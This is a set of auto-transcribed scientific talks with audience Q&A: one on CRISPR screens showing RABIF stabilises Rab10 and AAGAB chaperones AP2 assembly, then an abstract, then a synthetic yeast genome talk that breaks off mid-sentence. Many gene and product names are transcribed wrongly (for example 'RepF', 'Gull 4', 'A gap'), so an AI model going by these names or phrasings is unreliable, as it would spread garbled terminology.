the RepF knockout cells exocytosis was strongly reduced. And we could fully rescue the exocytosis by introducing the wild type RepF gene. And these are confocal images which also confirm the flow cytometry data. In the wild type cells you can see insulin relocate Gull 4 reporter from intracellular compartment to the cell surface. So I want to point out these are lipid droplets or adipocytes, non-nuclears. And here is the boundary of the cells. In contrast in the RepF knockout cells you can see insulin stimulated Gull 4 translocation was largely abolished. And here I want to make an important point is discovery of the first physiological function of RepF finally makes it possible to explore its medical mechanism. Now since RepF is known as a rib binding protein the first question we ask what's a rib target? Now if we look at the screen again, RepF was identified in the same screen as Rep10 which is a non-regulator of Gull 4 exocytosis. So we speculate maybe RepF controls Gull 4 exocytosis by binding to Rep10. And first we prepare the recombinant protein and test if these two proteins bind to each other. And this is the in vitro liposome called flotation assay. And here we anchor Rep10 protein in the proteal liposomes. Then we add a soluble RepF to the liposome. And after centrifugation the liposome migrate to the top of the gradient together with the bonded protein. Then we collect this fraction and analyze by STS page. So here I just want you to focus on this link. You can see Rep10 protein could bind to RepF in the coflotation assay and the binding appeared to be a stoichiometric. By contrast protein free liposome could not bind any RepF protein. So RepF bind to Rep10 directly. And since RepF is known as a putative gap we ask can RepF function as a Rep10 gap? The structure of RepF with Rep10 is still not known. But we do have the structure of the complex with Rep8 which is kind of related to Rep. Now based on this structure we found that there are several residues at the binding interface. So therefore we introduce mutations either single alien mutation or triple mutations to disrupt the interaction. And this is the InVecho GDP release assay which is commonly used to analyze RepGaFs. Now without RepF you can see almost no change. But when we added a wild type RepF you can see a rapid GDP release. And when we introduced the mutant either a single mutant or the triple alien mutant you can see the GDP release rate was strongly reduced. Now if you look at the initial rate of the triple mutation we estimate about a 24th job in the GDP release. So here came the surprise. When we introduced these mutants into a RepF knockout cells we found that these GaF mutants can rescue the group 4 acesatosis to the same level as the wild type gene. And we repeated experiments in multiple cell types, several different conditions. We always got the same results. But these data strongly suggest RepF is actually not a GaF in group 4 acesatosis. Now if RepF is not a GaF what's the biologic function? And here came another surprise. When we look at RepF, RepTen expression in RepF knockout cells we found that the protein disappeared. And we could rescue RepTen expression using either the wild type or the two mutant RepF. So the rescue of RepTen expression correlated with the ability of this protein to rescue group 4 acesatosis and had nothing to do with their in vitro GaF activities. So therefore we proposed RepF functions by stabilizing RepTen protein in group 4 acesatosis. Now to test this possibility we also tried lentil viral expression of RepTen in the knockout cells. Now this work is important because we had to rule out RepF doesn't control the transcription or epigenetic regulation of RepTen expression. So here we found we could readily express RepTen in the wild type cells but very little protein was observed in the RepF knockout cells. And this data consistent with the previous data I just showed you and supported the idea RepF stabilized RepTen protein. And when we treated the RepF knockout cells with MG132 which is a proteasome inhibitor we found we could fully rescue RepTen expression. And when we treated MG the cells with both MG132 and the cyclohexamide which is a protein translation inhibitor the rescue was abolished. Now this data suggests without the RepF RepTen protein could be efficiently produced but they're quickly degraded without the function of RepF. Now here we proposed two models. It's possible RepF stabilize intrinsically unstable RepTen intermediate so therefore it's more like a chaperone. On the other hand it's also possible RepF can protect the folded RepTen protein from proteasome degradation. For example by masking so called a diagrams. To distinguish between these two models we reconstituted RepTen and RepF into E.coli cells. E.coli as you know doesn't have any RepF or RepF. So we found RepTen protein could be produced in the E.coli without RepF but all the proteins end up in the insoluble pellets. We couldn't get any protein from the chaperonet. We could extract soluble RepTen protein only when RepF was co-expressed. So therefore RepF stabilize unstable RepTen intermediate and without RepF RepTen is going to aggregate in E.coli and then misfold and get degraded by the proteasome in the mammalian cells. And this supports the idea RepF is a modicul chaperone for RepTen not a GAP. So here I call it a Hodes chaperone because it's different from the classical chaperones like HSV70, HSV90. Both require ATP dependent cycles but RepF is a small protein it's not ATPs. That is recognize the substrate and stabilize the protein which promotes its folding. And then we performed the MISPAC analysis we identified two additional Rep protein, Rep13, Rep8 are also regulated by RepF. And this is our model. RepF as a chaperone they interact the substrate and stabilize these proteins which promote the folding of these RepGTPS into the native conformation. So therefore they can promote exocytosis. And without RepF the Reps cannot adopt native conformation they get degraded by the proteasome. With summary we identified the first biological function of RepF which enables us to discover the unexpected function of RepF in the RepGTPS regulation. Because all the RepGTPS function in the same way we expect maybe this Hodes chaperone model can also be applied to other RepGTPS. Okay let's return to this diagram. The surface level of membrane proteins determined by the balance of exocytosis and the indocytosis. Now having talked about exocytosis I'm going to focus on indocytosis. Go ahead. Is this a chaperone or a wrap on the steady state conditions or do cells have to go through something for this chaperone to be? Not in group 4 exocytosis but I think that's an interesting point. Let's come back to yeast. This protein is conserved in yeast. It was cloned first in the yeast but when you knock out the protein there is no phenotype. So at a normal condition it's not essential for yeast. But what I imagine is maybe during stress condition this protein is recruited to a trafficking pathway and it becomes essential. But in group 4 exocytosis you always need it. Does it bind to both G50 bounders? So we didn't address that but according to the non-structure with the Rep8 it's actually bind to the nucleotide free form which I think suggests it binds to the more upstream of the folding pathway. And so far I don't think there is evidence showing it bind to the nucleotide bound form of rep GTPs. Is it a chaperone or a co-chaperone? So at least they... It doesn't seem to bind ATP. It's up. No, no. It's a very small protein. So what I can say is that this protein forms direct complex and it's about a one to one ratio and if there is any additional protein bound to the complex we don't know yet. On this universality of this I have a lot of questions about that. First these are... I presume these three are the only rams you've picked up. Right. So that's right. At least in the cell type we studied these three rams are only proteins controlled by Rabbeff. So the question is are there other isoforms of Rabbeff in cells that could explain the other ones? And just a comment. Rams are very nicely expressed in E. coli in generally and in my experience Rabbeff is the only one that really is difficult. I haven't tested 10 or 13. But Rabbeff of all the rams that I expressed in E. coli was the only one that was very difficult to express. So my expectation would be that this is a very specialized thing for these three rams that you're providing there. And the question then becomes what's special about the structure? So I think I can tell you something. So why show this work to a colleague in the group for field? And he said finally there is explanation why they couldn't produce Rabbeff in E. coli. They had to produce it in the inside cells. And to come back to your question is anything special about these three proteins? And I talk to people in the field and there is no reason to believe they're special. And so you said that in other rams it could be expressed readily in the E. coli. But that doesn't really rule out that there is a bacteria shape around that perform similar functions promoted folding. But again it's all open question. Can I just comment? First of all I didn't say I don't believe because I never said I don't believe. I don't think. That's not true. I don't believe in code. You always say you don't believe. Not in science. Not in science. I just don't believe. Because I had a reason. Because I knew all this data. Only in writing. What? You only say that in writing. I don't think. I don't think. Especially when I have data. It's because it was only shown to that GDP can be released but not GDP can be acquired and like other GIFs. And here I want to just make a suggestion that maybe what's similar in these three is maybe just simple biochemistry of nucleotide affinity. There are affinity to nucleotides. And nucleotide free is known to be not stable in state of all GDPS. So maybe these three. But that's also true for all the other RAPGTPS. So nucleotide free RAPS unstable. I know. But I'm saying maybe these three have lower affinity than all the other RAPS to nucleotides. And maybe that's why they need this. I agree. I think there are certainly many questions need to be addressed. Yeah. So related to that. If you get rid of the gap, AS160 for RAP10. So AS160 is a gap. Yeah. It still have an effect. You mean repeat experiments in the gap and outcomes. Because now you enforce the RAP10 to be in the GDP. Okay. Yeah. Yeah. That's a good idea. We haven't tested. So it could be next step. In the synthesis. Yeah. So. Okay. So here we perform a similar screen. And it's largely the same, but I want to point out the difference. So here we didn't treat the cell with insulin. We sort for the cell with high-glued-4 reporter on the plasma membrane without a stimulation. And the idea here is we're going to recover the mutant cells defective in the endocytosis. So the screen recovered known regulators of endocytosis such as AP2 adapter subunits. I'm going to come back shortly. And TPC-1D4 is actually an inhibitor for exocytosis. So not only the screen recovered endocytic regulators, they also can recover inhibitors of exocytosis. But again, most of the genes were not previously known to be involved in the Glu4 endocytosis. So here I'm going to focus on one gene called AAGAP. Also, before that, I want to mention the screen recovered subunits of AP2 adapter complex. Now, AP2 adapter is a tetramer. Two large subunits are for endobeta and one medium subunit, mu, and one small subunit of sigma. Now our screen identified AP2S1, which encodes the sigma subunit. We also identified AP2M1, which encodes the mu subunit. So we didn't recover the alpha subunit, which is actually expected because there are two genes, AP2A1 and AP2A2. Genetic screens cannot recover redundant genes. The beta subunit, the same story, the AP2B1 encodes the beta subunit, but the gene can be fully rescued, I would say compensated by AP1B1. So we couldn't recover alpha and beta. But the idea is fairly clear. We recovered AP2 adapter subunits. Now what's the gap? Now, if you ask someone in the field, nobody have heard about this protein. It's a 34KD soluble protein. That's why some people you've called it P34. Alpha and gamma adapting binding protein. I'm going to come back to the naming shortly. Now this is known as IRC6P in yeast, but no phenotype in yeast. I'd like to mention that A gap is frequently mutated in the human disease called a punctate pommel planter, a keratodoma, PPK. Now this is the high flow insufficiency mutations, which means just one allele mutation. Given the phenotype, we see if both alleles are mutated, apparently the organism cannot survive. Now this disease is characterized by the thickening of the palm and the sole skin. And of course, the cause of the disease by A gap mutation is still unclear. And this is because we still don't know how A gap works. Again we knock out the A gap in adipose using CRISPR-Cas9. And you can see if you focus on the orange bars, A cause constitutive translocation of the reporter to the cell surface. So therefore insulin regulation is disrupted. The reporter go to the cell surface even without stimulation. And we confirm the flow cytometry data by confocal imaging. Again these are wild type cells, blue four mostly in the intracellular compartment. But if you look at A gap knockout cells, it's already on the cell surface. And the phenotype is very similar to AP2S1 knockout cells. And AP2S1 as you remember encodes a subunit of the AP2 adapter. And next we examined the endocytosis of our cargo. So here is the measurement of endocytosis, all the fluorescent labeled antibody recognizing Glufor. Now this is a very commonly used essay for endocytosis in the field. Now when we knock out the A gap, you can see a endocytosis of the cargo was abolished. And the phenotype was at least as severe as AP2S1 knockout. And the transfer receptor is a classic endocytic cargo of a class of medial endocytosis. When we knock out the A gap, there was a strong accumulation of the protein on the cell surface. And the phenotype was fairly similar to AP2S1 knockout. Now this data clearly showed A gap is essential to class of medial endocytosis. Now I said virtually nothing is known about this protein. The only hint came from East to Havre the screens, probably two decades ago. Now Scotty Robinson's group found A gap combined to alpha subunit in East to Havre. However we still don't know if this binding is a direct interaction or if this interaction is a biological significance. Next we prepared recombinant protein and the test direct interaction. And this protein from E. coli, we found the GST tag alpha subunit indeed interact with the A gap and the GST itself couldn't. And the interaction here appeared to be a stoichiometric. Now how does A gap regulate AP2 adapter formation? There's just some background light but hopefully you can see in the wild type cells on the cell surface there are abandoned AP2, thank you, AP2 punkta on the cell surface. But the strikingly when we knock out A gap, these punkta largely disappeared. So this is accompanied by a translocation of gluophore reporter from intercellular compartment to the cell surface. And we confirmed this confocal data by a turf microscopy which monitored the events near the plaza membrane. So here again in the wild type cells we observed a large number of AP2 punkta but they all disappeared in A gap knockout cells. And here I can imagine two possibilities. Maybe A gap is important for surface recruitment of AP2 adapter or they could be essential for the stability of AP2 adapter. It turned out the second possibility was correct. When we knock out A gap you can see the alpha subunit largely disappeared. At the same time the beta subunit was strongly reduced and the male subunit was also abolished. Our antibody didn't work for sigma so far but you can get the idea without A gap AP2 adapters were degraded. And of course this is highly reminiscent of what Rebaf story I just told you. So therefore we speculate maybe A gap also stabilized the AP2 adapters since they bind to alpha subunit maybe it's a shaper for alpha subunit. And again we recast A gap and alpha subunit in E. coli which doesn't have Reb which doesn't have A gap which doesn't have class remedial endosatosis. So here if you look at the pallet this is after extraction which represent the insoluble fraction we could express the alpha subunit without A gap but all the protein end up in the pallet we couldn't extract any protein in the supernet. However when we co-express A gap now we could extract the protein in the supernet. And this again is similar to Rebaf in the Reb10 story which suggests the alpha subunit itself is unstable. In bacteria it form aggregates and in mammalian cells it's recognized as a misfolded protein and degraded. On the other hand A gap can bind to alpha subunit and stabilize it. And therefore by coincidence we think A gap is also hold this shaper for alpha subunit. And next we look at the subset of the localization of the protein. So this is the alpha subunit on the plaza membrane you can see the puncta. But A gap by contrast shows a diffusive pattern which is a typical of cytoplasm which leads to our hypothesis. A gap actually regulates upstream event in AP2 adapter formation and it does not follow AP2 adapter to the plaza membrane. Now one prediction from the shaper model is A gap function should be independent of its location in the cell. To test this possibility we tether A gap to the ER surface by fusing it to a ER membrane protein called ATF6. And this is going to target the protein to the ER surface. So this is the western blot you can see the fusion protein expressed at the similar level as A gap and there was no degradation. And I think it's quite interestingly we found this fusion protein could to a larger degree restore transfer receptor in the cytosis. Even it's not as close as A gap rescue but it clearly showed this ER anchored protein can function. So therefore ER A gap function is not dependent on its localization which is consistent with a shaper model. Now this is a crucial test. A crucial prediction from the shaper model is forced expression of alpha subunit should rescue A gap knockout phenotype. And here we took advantage of very strong promoter wires derived promoter. And when we over expressed alpha subunit it could fully rescue the transfer receptor internalization and it's good as A gap rescue. And the base subunit rescue over expression didn't work and I expected expression of the four AP two subunits could rescue. So I think we can do two key conclusions from this data. The first is restoring AP two expression artificially can bypass requirement for A gap and all these data indeed suggest A gap is a whole this is a shaper for the upper subunits. But I think A gap is more than just a shaper. So I'm going to show you some data and look forward to your comments. So what happens after A gap bind to alpha subunit? To monitor A gap interaction with AP two subunits we developed HATG system in which HATG is added to all the four subunits of AP two subunits. And you can see this is sigma HA this is mu HA and alpha and beta they migrate at the same location in SDS page. So here is the coIP data. We found A gap could pull down alpha subunit as expected but it could not pull down the sigma subunit by itself. So when we put in all the four subunits A gap could pull down alpha subunit and the sigma subunit. We could never see the mu subunit and also we performed additional analysis different coIP design using an untagged version of alpha subunit. We could only see alpha and sigma subunits. We never could see beta or mu subunits. And if we confirm this coIP data by using recombinant protein so here I just want to see this line. So we saw the sigma subunit bind to alpha subunit and A gap. It's a very small protein so the staining is very faint but I think it's about a stoichiometric interaction. So therefore the A gap alpha subunit dimer subsequently recoups the sigma subunit. So I like to put what I talked about so far into this model. We think AP2 adapter assembly is not a spontaneous process as previously assumed. Instead it's a highly organized process. The initiator of the process is a dimer or A gap and alpha subunit. And the dimer here recoups the sigma subunit. Since beta and the mu subunit does not bind to A gap we propose they can replace A gap from the alpha and the sigma subunit which allows the formation of the tetramer. So what happens after is well known. So the story I just told you is a prequel of the story that has been told again and again. And what happens without A gap? The entire AP2 assembly process just collapse. All the subunits got degraded. In summary we showed A gap is a master regulator of AP2 adapter assembly. In addition as a shaperon for alpha subunit we propose maybe A gap can prevent AP2 binding to non-cognitive cytosolic proteins. So many cytosolic proteins contain dilucid signals but they should not be recognized by AP2 adapters. Now if the AP2 adapter is fully formed the beta subunit can block the binding site unless until it's opened up on the plaza membrane. But what happens before beta can mask the binding sites? And we propose A gap may be functioned by blocking the binding sites so to prevent the binding to the non-cognitive proteins. Now because other magmaeeric trafficking factors like AP1, AP3, COP1 face the same challenges of assembly and specificity issues we think there may be other A gap like molecules that control their assembly. Now before I finish I'll let you return to the PPK disease. Now here is a diagram of the skin cell contact. The contact between skin cells are driven by a series of membrane proteins and the cytosolic proteins which include a decimal glean, decimal plaking, DP here and keratin. Interestingly, most of these proteins are also found to be mutated in the PPK disease along with A gap. Now the mutations of these genes make total sense because you can imagine their mutations are going to compromise the integrity of the skin cell contact and therefore cause the skin disease. But how does A gap fit into the picture? So here I just want to show you a preliminary observation. We did a proteomic analysis of surface proteins in A gap knockout cells and we found A gap can mutations downregulate a protein called decimal plaking. So without A gap this protein level on the surface was strongly reduced. Now this is a very preliminary data. No work needs to be done but I think it has the potential to explain why A gap mutations can cause the skin disease. So before I wrap up I'd like to convey the message. There are still many mysteries in the cytosys and the exocytosis that need to be solved. Over screened identified many membrane proteins which show the very strong knockout phenotype but virtually nothing is known about their biologic functions. Now if you do a sequence prediction you still got nothing. In my opinion moving forward a very exciting direction is to find out how these proteins regulate cargo flow in the cell. So with that I'd like to thank the people Dan, Lauren, graduate students, Haja, Postdoc so they did all the work I showed you today. I'll return to this and thank you for your attention. So this is very cool that you're regulating AP2 assembly but could you tell us why it's not lethal? Yeah so I know clustering is lethal because the trafficking from the Golgi it's actually more lethal. And there are not a list of certain cells. It's lethal. You eliminate AP2 and it's lethal. In cell culture? In animals I can understand. AP2 elimination is lethal in animals and if you eliminate animals. For sure. Why this is so important for the folding of AP2? The only thing that you're getting as you said is the APP care. That's a high-flow insufficiency. So just one little mutation. So now remember I studied West Coast Fusion Protein Munk 18 for many years. High-flow insufficiency mutation of Munk 181 only cause certain neuronal phenotype. Overall the patients are normal. So I think why skin cells are more sensitive? Maybe some mathematical modeling I cannot tell. But overall I don't think other tissues are going to be sensitive. And again I agree not count AP2 in animals is going to kill the animals. But in the cell culture levels I don't think there are essential genes. Well if you don't have AP2 cells divide with AP2 they're very sick. There are cytokinesis problems. I mean lots of issues. So I think you could be right. I think you are right. Or these clonal CRISPR knockout cells. Eventually we select for the mutants that can grow. So it could be compensation. It could, well it's not going to be phenotypic compensation. Or could be a hypo-morphic mutations. Reduce most of the activity but there's some residual activity that keeps the cells alive. Yeah. Well when we knock out essential genes in the proteasome the cells can grow better sometimes. And I've been over a few weeks. I know but if you eliminated AP2 cells are sick as hell. So this actually can be precessively checked. There is an essential gene list. We checked a couple years ago. I don't think these are essential genes. Maybe surprisingly. At least not in the cancer cell lines. There are several screens. Well I cannot say for normal cells but at least in cancer cells they are not essential genes. Yeah it's a comment about the rabife story. So if I understand you thought it's a chaperone if you remove it, but I'm not so sure that this excludes the fact that the real function could be something else. Because it's common to find situations in which you have a dimer in which both of the two proteins have real functions if you eliminated one. Can I just check this question? Do you check it on endogenous proteins or express proteins? Because the chaperone it could be different. The Rep10 right? The Rep10 is all endogenous. And also we could force express Rep10 using a viral promoter. We restore Rep10 protein. We total the rescue rib after knock out phenotype. So I think your question has two parts. First I think it's fairly clear in our case it's a chaperone. But does it function in another way? Could be a gap. In a different possible way. I don't think a gap. But in that case I think it's possible. Is it complete here? That it doesn't help? I would call it real function, modulatory function on the activity of the rep10. But then of course it also stabilizes. So in general this is the case for other diners. I think that's totally possible. For example a gap. Even to chaperone but I think as I showed it's more than that. It's organized the whole assembly pathway. Maybe RepF is doing that also. Stabilized rep but also control downstream function. So right now we just don't have the evidence. So quick follow up on this and then I have another question. Does it work on second form? Second form. Yeah, okay the yeast. Well the yeast I remember if you knock out a RepF or homolog you don't see anything. You see a little bit of effect only when you have a rib mutation that you over-express is to rescue. I think that only demonstrate those protein interacts. So we haven't tested yeast yet. But I think you, yeah I don't see how you can test a function without a knockout phenotype. It's kind of hard. So the other question was on the very last part of what you're saying about phenotype. I was confused how down regulation of disnoblackin would have anything to do with the centroses. Right so I think this is going to be indirect effect. We did a proteomics and knockout A gap caused a massive disbalance on the surface proteins. So a large number of proteins either you get too much or you get too less. I think it's going to be for example maybe a cargo adapter on the plus membrane which is reduced but in turn you get a more or another protein because of lack of inhibition. So I think it's going to be really hard to interpret at this moment. We don't know why it causes the disease. I just want possibility. And I think it can be indirect effect. For completely independent of the... Yeah so in that case I would think we probably want to rescue AP2 and check it. So yeah. I find your phenotype which has to do with critical site dysfunction. You know you get this scaling part. Oh which part? Oh yeah that one. Okay. Have you looked at... Is your pit size a patient's? No no no I was going to ask you whether you've looked at the organization of the cells. Do they maintain cell junctions? Yeah so that's going to be a crucial experiment to study the disease. We're thinking to introduce the precisely the same mutation into APS cells and the differentiating into a keratinocytes. I think that's going to tell us a lot about this protein function. It could very well be that your protein whatever the name is Aga is doing what it's doing and it is involved in cell cycle specific cell junction disassembly. And that is being effected and therefore what you end up with is a cell that does not disassemble desmosomes when they have to divide and as a result what you end up with is creating a phenotype which is like dead cells. Right. But you're still thinking the more direct cause is the endocytosis effect. Right. I agree. So what happens after APTool we cannot say for sure. Just a speculation. Okay so we can just two small comment questions. Have you checked the mutant that caused the phenotype in APT? That's right so we so many of the mutations actually are premature terminations right around the middle and I see terminus. We didn't have the precess mutation but we have done a truncation which mimics the disease mutation so that one was totally inactive. So we saw endocytosis effect so in our assay you need the entire protein. So you think you said at the end I think it's fascinating how extensive it is this notion of how many chaperones to help so folding right. I mean the same is true with HSC in 9. Yeah. So we can talk more but I think we're actually touching even much bigger problem for multiple subunits like APTool or SNERS. They are expressed at different chromosome location different promoters. How do you coordinate their assembly? How they're expressed at different levels. I think maybe this is one solution for that. You have initiator from one subunit and just go from there and everything else if they're expressed more or less it doesn't matter. If too much they're going to get degraded. If too less they're going to wait for initiator to get ready. So I think this may be a general way to assemble multi-meric proteins in the mammalian cells. How sensitive? But at least in AA gap case it's very sensitive because without AA gap you don't get any APTool adapters. What's your second question? So the question is how they're substrate? Yeah. So we have some preliminary data. Say AP1 the gamma subunit also disappears with AA gap knockout. But the delta adapting was normal so AP3 was fine but AP2 and AP1 they were affected. So we can continue this in the panel discussion. It's okay. Thank you. Okay thank you very much. Thanks.
|
Cargo proteins moving between organelles are transported by membrane-enclosed vesicles. The core engines mediating vesicle trafficking are now well established. However, we areonly beginning to understand the regulatory networks superimposed upon the core engines to adjust the rate and direction of membrane transport according to physiological demands. The advent of the revolutionary CRISPR-Cas9 genome editing system enabled us to systematically identify new components of the regulatory networks. We developed new screening platforms and performed unbiased genome-wide CRISPR genetic screens to dissect the exocytosis and endocytosis of cell surface transporters, fundamental processes in cell physiology. Our screens identified known regulators but most of the hits were not previously known to regulate the pathways. I will focus on the unexpected mechanisms of RABIF/MSS4 in exocytosis and AAGAB in endocytosis. I will also discuss how the principles uncovered in our studies shed light on vesicle trafficking in general.
|
10.5446/50890 (DOI)
|
So, thank you to the organizers for inviting me. I really enjoyed the meeting. And sorry the previous talk ran over, but it was my fault for asking some of the questions. And thank you most of all to the AV guy for getting my talk to show up. So I'm going to talk at the beginning about, so I asked about what to talk about. And I decided to send in a title about work that we've done on synthetic yeast genomes. But after hearing the earlier talk about organoids, I decided to throw in an organoid bonus for a work that is going on in organoids in my lab in collaboration with Andy Ewald. So Saccharomyces cerevisiae 2.0. So the introduction to this is that my previous life before I was an academic at Johns Hopkins, I worked at a biotech company. The last product I worked on there was the 454 genome sequencer. So it was really exciting at the time. This is a curve from 2003 showing that our machine was the world leader in DNA sequencing only for a couple of years, however. Then alumina took over. So let's see. There. So this was our productivity and then alumina took over. And we had a couple more years on the market. But the curve I'll talk about is the C.L.O. in productivity in writing DNA. So the same way that DNA synthesis has been increasing in efficiency, so has DNA synthesis. These curves are from Rob Carlson, who's a biotech writer. And that stimulated a project to make a synthetic version of the yeast genome called Saccharomyces cerevisiae 2.0. So in order of appearance in the team, so the overall concept for the project. Really goes back to Jeff Bucca and Trina Vastan Chandra Sagaran, who are having coffee one day and talked about possibility of maybe making synthetic yeast chromosomes. And shortly after that, when he was having trouble using DNA strider to design entire chromosomes, he asked me and my group to get involved. So we've been responsible for the front to back informatics for the project. I got involved because I thought there would be some really interesting scientific questions. However, most of the time we spent writing workflow software. So we did all the software to design the synthetic yeast genome, to do all the ordering, to run all the laboratory, to automate as many processes as we could, and then to analyze the synthetic cells that we got out, synthetic and that they have synthetic DNA. And then working with me were Sarah Richardson, who's now CEO of a synthetic biology biotech microbiome, Giovanni Strachodonio, who's now faculty of the University of Essex and Cunyong. And then other participants, Romain Kassoul, who's in the back and spoke earlier today, has been working on comparing the 3D confirmation of the chromosomes that we've synthesized with the native chromosomes and then partners all across the world making different chromosomes. So about a year ago, there were a series of papers. So this figure was generated with data from Romain's lab showing the synthetic chromosomes organized in the nucleus in the sort of goldish color with the remaining wild type chromosomes in sort of the sort of whitish, grayish, grayish color. So we've made them, the cells work. Here is progress to date. So yeast has 16 chromosomes. And in addition, we've designed and are making a 17th neochromosome that has all of the tRNAs on it. So one of the changes that we made, I'll get through sort of the types of changes we made in the genome, but one of the changes we made is taking tRNAs from all of their native locations and putting them all together on one special chromosome with the idea that possibly the other chromosomes will be more stable because tRNAs are a place of DNA instability because of the high transcriptional rate and then, I guess, DNA replication forks run into transcriptional apparatus and you get DNA strand breaks. Also the idea of orthogonalization, that a lot of synthetic biology has been driven by electrical engineers who think about designing orthogonal components. And I don't think that idea has really gotten very far, but nevertheless we've decided to orthogonalize the genome by putting all the tRNAs onto one separate chromosome. So there you go. So in blue are the chromosomes that have been completely synthesized, integrated into yeast cells and are able to support the yeast cell life with fitness that is pretty similar to wild type. So no real fitness defects. Part of the process I'll talk about is the fitness defects that we found and what they were due to. And yellow are chromosomes that have not yet been completed, but all the DNA has been synthesized, most of it's been assembled and some of the chromosomes are completed but have fitness defects that we are still tracking down and getting rid of. We have single cells that have up to three synthetic chromosomes at this point. There's been no real barrier to getting synthetic chromosomes into a single cell. The barrier is more that it goes through a myotic division which causes recombination between the synthetic chromosome and the wild type and then we have to do back crosses. We as in Jeff Buka's lab does back crosses to get a fully synthetic chromosome. So quickly the changes that we've made. So house cleaning, we've taken off the original telomeres and we put on a universal telomere sequence. A lot of pseudo genes that accumulate in the sub-telomere, we've gotten rid of them. We've removed transposons and repeats, removed introns. So as I mentioned we've got this neochromosome that has all the tRNAs. So this is an interim version of the neochromosome. We're maintaining the copy number of the tRNAs in the wild type genome in the tRNA neochromosome and sort of as we're doing the deletions we're adding the genes to the neochromosome. So that work is being led at the University of Manchester now by Patrick Tye. So we're also doing synonymous recoding for two reasons. One is that part of the synthesis and assembly technologies have restriction enzyme requirements that either restriction enzymes are used to do part of the synthesis or assembly or for late stage, I guess like restriction ligation reactions. So sometimes we have to add and remove restriction enzyme binding sites and we do that with synonymous recoding or protein coding regions. We're also putting in watermarks that are called in our hands PCR tags that we take a protein coding region and we change the DNA sequence so that it is unique in, essentially unique in the genome really it's the two, we have so two recoded tags that are close enough together, a couple base pairs that we can easily make a PCR amplicon to check quickly that the DNA content is synthetic as opposed to wild type. So this is actually one of the regions where reasons, this is one of the areas where we had to actually pull out some algorithmic work and make this run fast enough to be able to solve the optimal, the constraint problem to be able to get these to be unique in the genome. All right, so new capabilities we've done TAG TAA recoding so that eventually we might be able to introduce a 21st amino acid into the genic code and we've put in LOXP sim sites so these are symmetric versions of LOXP sites that when Cree recombinases around permit recombinations in the genome to give inversions transpositions deletions and all together there's about one million base pairs difference between the DNA we designed and the wild type genome as well as this additional chromosome. Why is the 21st amino acid? Why did you put the 21st amino acid? Oh, so this is getting rid of the TAG codon so then we can put in a TAG codon and have it and then introduce a tRNA synthetically coupled with an unnatural amino acid and then have an additional functionality in the protein code. So there are like more wilder science fiction-y type things to try to get all that apparatus working inside a cell and Farron Isaacs has done similar work to get E. coli that have been recoded to free up codons. Why would you remove the introns? Why would you remove the introns? So it turns out we can't remove all the introns. We thought we could but some give fitness defects. We moved most of these genes don't have introns and we thought it would be cool to get rid of the ones that are there. Because they seem to be sometimes clustered in important genes, right? So there's been other work and I don't remember the name of the group that did a project to systematically delete introns. Some introns you can't delete but not because of the intron itself. It's because there's a non-coding gene in the intron and if you, so at least, so this is my, I'd have to go back and check my notes but that if you move that non-coding gene somewhere else then it's fine. So I'm, so I'm, don't hold me to that, that sort of, but there are other introns that people have deleted and a couple of them. I think they're five or six that when you delete the intron you get a fitness defect. Most introns you don't get a fitness defect when you delete. Part of the idea about deleting the introns was seeing whether some of the splicing apparatus then became non-essential. You know, is it just there for splicing of introns and predicting coding genes or does it have other functions? So that was the general idea. This is, so I'm not really going to talk about the scramble experiments so I'll. So the, so yeah, so on the computer we take the sequence, we break it down to smaller and smaller pieces. Eventually they get ordered. So they get ordered, then we receive them. At Johns Hopkins for a while we had a factory running with undergraduate labor taking the oligos received at that point from IDT and then doing PCR reactions to build them across to 600 more pieces and then build them up in succeeding stages of assembly. So these, these undergrads completed the synthesis of chromosome three published in 2014. So that, that was, that was really exciting. But the course is over now because all the DNA has been synthesized. So it was fun while it lasted. So here's a picture of what the design looks like if you want to make a figure for a paper. So these are different parts of chromosomes and these arrow things are protein coding genes, the green bands are the PCR tags we put in. The green diamonds are the LOXP, SIM recombination sites. The red is an essential gene. These purplish are autotrophic, oxotrophic markers and, and so there you have the design. So, but we made some mistakes. So it is, it is a challenge to do all of this design and, and so yeah, so mistakes were made and I guess really they'd be my fault because my group did the computational design. So there are a lot of problems. So one is we don't really have any good models that map from sequence to fitness. So we just heard a talk trying to build up regression models that say here are the variants and here's the fitness. So those are still, you can't really do that. Also trying to identify hyphenous sequences that obey synthesis and assembly constraints so those algorithms didn't really exist. We weren't, you know, sure exactly whether what we implemented was going to work well. Also the, the execution, just putting all of this together in a production pipeline. So when the human genome sequencing project started, there were lots and lots of groups writing software to first, you know, look at gel images and get DNA sequences and then do all this assembly and, you know, sequence validation and instead it was a couple people in my lab doing all of the design and then risk benefit. So this to me is the most interesting that in talking through the design choices, so we just heard like why get rid of all the introns and so like one answer is like, you know, why not? But there are other changes that we were thinking about making that, you know, we weren't sure, you know, pushing sort of the design goal of being able to test wilder things you can do with the genome versus worrying that we'll get dead cells out and won't have a way to figure out how to get them back healthy. So we wanted to, yes. You didn't mention the ribosomal RNA. You would use the corpus, right? The number? I don't know. I don't think we really reduced the ribosomal arrays. That's my question was probably she could work it, but use the number of this and make it a smaller chromosome. So I'll get to this later, but I'll answer it now. Actually one of the fitness defects that we get with the tRNAs is that we don't have enough tRNAs in the cell because we're deleting them, but often we haven't added back the tRNA neochromosome. No, I'm talking about the ribosomal. No, no, no. So what we see is upregulation of the ribosomal, of ribosome components to make up, to compensate for the depletion of tRNAs because we don't have as many copies of the tRNAs as we're supposed to have. So if we further reduced the ribosomal arrays, I think we'd have even reduced fitness. So we haven't been reducing the ribosomal arrays. I don't think we'd want to reduce the ribosomal arrays. Definitely not until we have the tRNA in. And then that would be sort of, I think that would be a reasonable thing to try, but for now we're not reducing the ribosomal arrays. So how many copies do you have? Maybe we will move this question. No, this is a quick question. Okay. But the quick. We have as many as there are on the well type. So we want to end up with a beautiful well functioning classic yeast cell, but maybe like what we're going to make is more like the Bobor. So there you go. So all right. So here we go. So what mistakes were made? And if we knew then what we do now, what would we have done differently? So if present day me went back to like 2007, 2008, there are lots of mistakes that I wouldn't make, but in terms of yeast design, what would the difference have been? So here's this first point. So about the ribosomal RNAs. So we actually made one blunder and it was not my fault because Giovanni warned Jeff about it that there's a single copy tRNA that we, like Giovanni said is a single copy. Are you sure we should delete it? And we deleted it. And then there was a fitness defect and we had to add it back. So we told them that we thought it'd be a problem and got deleted anyway. Fitness defect. So that was a blunder. And so as I mentioned, the tRNA copy number variation that we transiently have reduced copy number ends up with ribosomes compensating the opposite direction. So if you look at those 2017 papers, each yeast strain that has a synthetic chromosome has mRNA seek done. And pretty much the only significant differences are that ribosomal genes are over expressed. All right. So 